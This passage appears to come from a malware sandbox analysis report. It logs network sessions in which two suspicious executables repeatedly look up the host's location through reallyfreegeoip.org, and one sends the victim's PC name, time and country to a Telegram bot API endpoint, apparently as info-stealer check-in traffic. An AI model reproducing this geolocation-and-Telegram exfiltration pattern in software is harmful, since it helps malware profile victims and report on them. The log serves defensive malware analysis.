2024-10-07 20:41:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:14 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 6 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bq%2B0360srj315LeEMC1paH3zfonoLxzZFJg%2FlUZpG0TU228yImjA6LcLM%2FIbfQQJgbgAn5NfLO9qT8sxoUwoV0tFFL8HuRCpVqFpPGkNRRi1o3MuJf4BSP99JYmqPB9w5wfhOD%2FL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5fadf7f0f6d-EWR
2024-10-07 20:41:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49724	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:15 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:15 UTC	676	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 7 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W5fvm9ipaW7rZBPNDho8LKNWl%2FpOxFzwiXd%2FdMsKi1rJr2%2Fo0eA48gamZoIBqgFgZKvBvkyJwKcNF%2B%2Fi1y3YLUE7GdirnEV532FCHcjigtRTASPSMf1WLot0edw1IAh8s8oRPntc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b5ff4e7c8cc8-EWR
2024-10-07 20:41:15 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49726	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:16 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:16 UTC	672	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wr2XUUikEuHVewSZ%2Bv3bhot6%2FrbH8e1l4G529NKHdBqRFt5Ldr79rS28HEvGZRe6oG%2BUUJ6SRt4FBOmPfXBKZUMV2W5PEuCMhygNbqRtyUfUXL8HN3iz8RRGDNFtHa8KzQuQGpwU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b603aadc1a07-EWR
2024-10-07 20:41:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49728	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:16 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:16 UTC	682	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckvbyM96iwvBcV8%2B7tPa3%2FDOuO5enbAk1Dx2DWvA2VCQKd8L7zJj3cBesfAq5eS2PIDoqVKTkqu5xeXoh%2FRyVUaahXYsW1%2BXTewyOoyYM1eOhJA%2Fx7FuC%2FE%2BLQUWfOZHd%2BLaoAYN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b6085e0d4370-EWR
2024-10-07 20:41:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49732	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:18 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:18 UTC	673	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LUVBBA4VhZv3YcaZY7xVOVk17a58g0TUdVbclI%2FtUfCs%2BNIzURoLPij2ASHQae9MME%2F69Z7BxA6InEUby0n5RENgJldGj54Gj3ZhJTUDJtRUuKkp6cImFJ6HzN6LU9Ukidp9DcMl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b6138fa74385-EWR
2024-10-07 20:41:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49733	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:18 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:18 UTC	687	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kuYgZfFU%2BM%2FXJrsRoLckOSo0XwBiMh0MznYMvPS%2FeiRWBl%2BBG%2FdRKDAcETjJ6hOpaRZLYO0VOGtH70KJ2%2F05wNj%2Bt4HPa%2BfwUZeJfkU%2FWisR4l14p6SfYkr1nUUFexZcfLjdpum%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b6145a8b80da-EWR
2024-10-07 20:41:18 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49736	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:20 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-07 20:41:21 UTC	679	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EeVaCNbf%2Fyn%2F%2FyHzqh3ACdKV5CdwmwU0LSJ8fj%2BZsPL%2BADfMf82oINrZBMagRXCQLR1WXChRGunS%2Fv7YJE104LZQLZ0swMo7ZMuwFFj2yI4xQOMUDgWKf8HOvDF4RQPvF8Coklsc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b6228e9341fe-EWR
2024-10-07 20:41:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49737	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:21 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:21 UTC	669	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 13 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=57SwecLccm91rAfIoHa2mGXKNhrd8oCW9ecExruTg0BXOpjTNNuO7dhiCPCioReXTUOvoHr0zKih6sacl7FXZuGRPCYs5acRxGhdU%2FHBn1KdfqvPgIyvGGlwXkIeZeM7SKGAC6Bm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b6235e13420d-EWR
2024-10-07 20:41:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49744	188.114.97.3	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-07 20:41:23 UTC	701	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 20:41:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 14 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PuPeO46Az2vqMBSgPSIBP6GfyuYzImJBsSC3ywrTgdn4B83FYYu91qaqQ4eG66C1z%2Ba26Yyxni04tmg6rywmfz6EOIG7B9bIkVNaXWcrTea6YXMKuVyYn2hBDYOAdzx3zQihBO%2Bu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf0b62e6efb43a4-EWR alt-svc: h3=":443"; ma=86400
2024-10-07 20:41:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-07 20:41:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49746	149.154.167.220	443	7772	C:\Users\user\Desktop\EUYIlr7uUX.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:23 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2008:51:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-07 20:41:23 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 20:41:23 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 20:41:23 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49747	188.114.97.3	443	8064	C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 20:41:23 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
